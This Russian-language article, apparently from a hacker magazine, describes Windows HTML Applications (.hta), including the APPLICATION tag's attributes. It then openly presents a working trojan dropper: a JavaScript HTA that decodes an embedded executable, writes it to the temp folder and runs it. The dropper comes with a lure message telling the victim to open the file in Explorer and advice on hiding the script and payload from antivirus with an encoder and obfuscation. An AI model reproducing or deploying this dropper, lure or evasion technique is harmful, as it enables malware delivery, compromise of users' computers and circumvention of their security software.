Как-то раз я, листая MSDN, совершенно случайно наткнулся на
описание одной технологии, которая, как выяснилось, поддерживается еще
со времен 5-й версии MSIE. Назвается она HTML Applications. Суть в том,
что если html-контент сохранить в файл с расширением .hta и между <HEAD>
и </HEAD> вставить специальный тег <APPLICATION/>, то к этому контенту
не применяются никакие ограничения, связанные с безопасностью, т. е. на странице могут присутствовать любые элементы управления, скрипты могут
создавать любые COM-объекты, писать в любые файлы и получать доступ к
контенту во фреймах, независимо от того, из какого домена он был
загружен. Это дает возможность создавать
полнофункциональные приложения с HTML-интерфейсом. Если же JavaScript не подходит для отдельных частей
программы, то их можно реализовать в виде ActiveX объектов, а DHTML
использовать только для создания GUI. Очевидно, эта технология появилась
вследствие тенденции использования движка MSIE, где надо и где не надо. О безопасности
мелкомягкие тоже подумали. Простая вставка тега
<APPLICATION> не превращает пагу в доверенный источник. Если открыть
ссылку на hta-файл, то, как и при открытии exeшников из инета,
появляется диалог с кнопками "Открыть", "Сохранить" и
т.д., предупреждающий, что этот контент может представлять опасность.
Всё правильно, но опытный распространитель троянов сумеет впарить такой
файл юзверю, не знающему об этой технологии. А уж возможностей скриптов
и компонентов, установленных на любой windows-тачке,
достаточно, чтобы скачать и установить какую-нибудь прогу, прописаться в автозагрузке и
даже стереть все файлы, если это доступно текущему пользователю. HTA-файл может быть вполне работоспособным и полезным
приложением. Хотя использовать эту технологию в коммерческом софте
трудно, поскольку HTML/JavaScript исполняется в виде исходника и,
следовательно, не может содержать платных или секретных алгоритмов.
Атрибуты тега APPLICATION
Этот тег не может содержать внутри себя никаких тегов или
текста, но требует закрывающего тега. Можно писать так:
<hta:APPLICATION></APPLICATION>, а можно так:
<hta:APPLICATION/>, как в XML.
У тега APPLICATION есть довольно много атрибутов, с помощью
которых устанавливаются свойства окна. Все они необязательны, и если
тебе безразличен вид окна твоего приложения, то можешь их не указывать. Атрибуты доступны из скриптов, что позволяет изменять свойства
окна, сворачивать/разворачивать и т.д. Вот список атрибутов с краткими пояснениями:
applicationName - имя приложения
version - его версия
border - тип границы окна
borderStyle - стиль границы
caption - показывать ли заголовок окна
commandLine - возвращает аргументы командной строки
contextMenu - показывать ли контекстное меню
icon - иконка окна
innerBorder - внутренная 3D-рамка
maximizeButton,
minimizeButton,
sysMenu - показывать ли соответствующие кнопки
navigable - открывать ссылки в том же окне
scroll,
scrollFlat - свойства скроллбара
selection - разрешать выделение
showInTaskBar - show in taskbar
singleInstance - только один экземпляр может быть запущен
windowState - состояние окна
Старт из HTML
Теперь конкретный пример того, что можно сделать, имея
возможность впарить юзеру HTA-файл. Допустим, у тебя есть готовый
троян в виде exe-файла, и тебе не терпится совместить его с новой
технологией. Трояны обычно бывают маленькими, и, думаю, что ничего страшного
не произойдет, если размер нашего HTML-приложения будет немного больше.
Для того, чтобы вставить бинарные данные в текст, нам потребуется их
закодировать. В JavaScript поддерживается стандартное кодирование урлов.
Этот метод годится только, если нетекстовых символов в коде мало. Если
их много (а так обычно бывает, так как внутри ехе-файлов заголовки и
секции дополняются нулами для выравнивания), то этот метод не самый
хороший. В худшем случае код будет втрое длиннее исходного. Гораздо
лучше было бы заюзать кодировку base64, при которой размер любых данных
увеличивается на 33%, но я не нашел в JavaScript встроенных
средств кодирования и декодирования по base64, а реализовывать их прямо на
JavaScript как-то некрасиво, имхо. Так что кодировать будем функцией
escape(), а декодировать - unescape(). Эксперимент показывает, что эти
функции работают со строками любой длины. Так что можно записать весь
экзешник одной строковой константой в скрипте.
Итак, алгоритм, который нужно реализовать в скрипте, такой:
1) Раскодировать содержимое исполняемого файла
2) Записать его
3) Запустить
Отметим один момент: важно не лопухнуться с выбором места для
файла. Если юзер не админ, то записать файл куда-попало не получится.
Нужно узнать от системы путь, например, папки temp (а это мы сделаем
тоже средствами JavaScript), и записать файл туда.
Итак, затрояненный HTA-файл может выглядеть примерно так.
<font color="#008000"><HTML>
<HEAD><hta:application />
<SCRIPT language="JavaScript">
code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла
var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();
var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его
</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
Неплохо еще защитить скрипт от обнаружения антивирусом.
Существуют проги, изменяющие скрипты до неузнаваемости. Они называются
obfuscators (подробнее о них можешь прочитать в нашем
журнале). Microsoft предлагает свой обфускатор - Windows Script
Encoder. Он шифрует скрипты, а расшифровщик встроен в состему.
Инструкция честно предупреждает, что Windows Script Encoder не защитит
код от целеустремленного хакера. От хакера, может, и не защитит, а от
антивируса защитит. Нужно только скормить ему готовый HTA-файл,
и вместо скрипта появится какая-то абракадабра, а вместо
"JavaScript" будет написано "JavaScript.Encoded". Нельзя забывать о том, что ехе-компоненту тоже необходимо
сделать неузнаваемой, так как она записывается на диск, и при этом
может быть обнаружена антивирусным монитором.